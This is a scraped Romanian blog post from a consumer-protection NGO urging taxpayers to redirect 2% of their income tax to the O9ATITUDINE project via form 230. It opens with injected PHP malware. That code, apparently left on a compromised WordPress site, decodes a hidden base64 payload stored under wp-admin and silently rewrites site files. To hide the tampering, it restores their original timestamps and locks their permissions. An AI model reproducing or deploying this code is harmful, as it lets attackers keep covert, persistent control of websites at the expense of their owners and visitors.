$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Transforma 2% in 100% o9atitudine! – O noua atitudine

In primul rand, formularul 230 este modalitatea prin care poti direcţiona 2% DIN IMPOZITUL PE VENIT catre un proiect din cadrul unei organizatii non-guvernamentala, asociatie sau fundatie.

Ce nu iti este clar despre 2 %?

Majoritatea contribuabililor la stat nu stiu ca impozitul care se duce in visteria statului poate fi redirectionat catre o cauza pe care doresc sa o sustina din cadrul unei organizatii sau din cadrul unei asociatii.

Astfel, acesti bani nu reprezinta o sponsorizare, donatie sau contributie, ci ei sunt parte a bugetului de stat, adica exact 2% din impozitul pe care oricum il platiti statului in fiecare an.

Fii informat si hotaraste singur ce sa facă statul cu banii tăi– DIRECTIONEAZA 2% DIN IMPOZITUL PE VENIT CATRE PROIECTUL O 9 ATITUDINE!

Descarca formularul 230 (http://www.iaatitudine.eu/230.pdf )sau intra pe site-ul http://www.iaatitudine.eu/pentru mai multe detalii despre proiectul O9ATITUDINE.

Aici vei gasi toate informatiile de care ai nevoie pentru a-ti asuma responsabilitatea de a decide in mod direct cand, unde si catre cine sa ne îndreptam atentia din punct de vedere social, deci unde si cum vei directiona in mod corect cei 2% din impozit catre cauza pe care vrei sa o sustii.

 

 

Ajuta- ne sa te ajutam!

Fii un consumator activ si implica-te direct in programele de protectia consumatorilor. Sustine acest proiect si direcţiona 2% din impozitul pe venitpentru a putea sprijini consumatorilor din Romania, miscarea de protectia consumatorilor ca si organizatie non guvernamentala. Aceste fonduri vor fi folosite pentru a acoperi cheltuieli precum campanii – campanii de mediu, campanii de informarea tinerilor in cadrul actiunilor desfasurate in unitatiile de invatamant , (Detalii pe http://www.anpcppsr.ro/campanii.php) procesarea sesizarilor si reclamatilor (http://www.anpcppsr.ro/reclamatii.php) si mediere.

 

 

By o9admin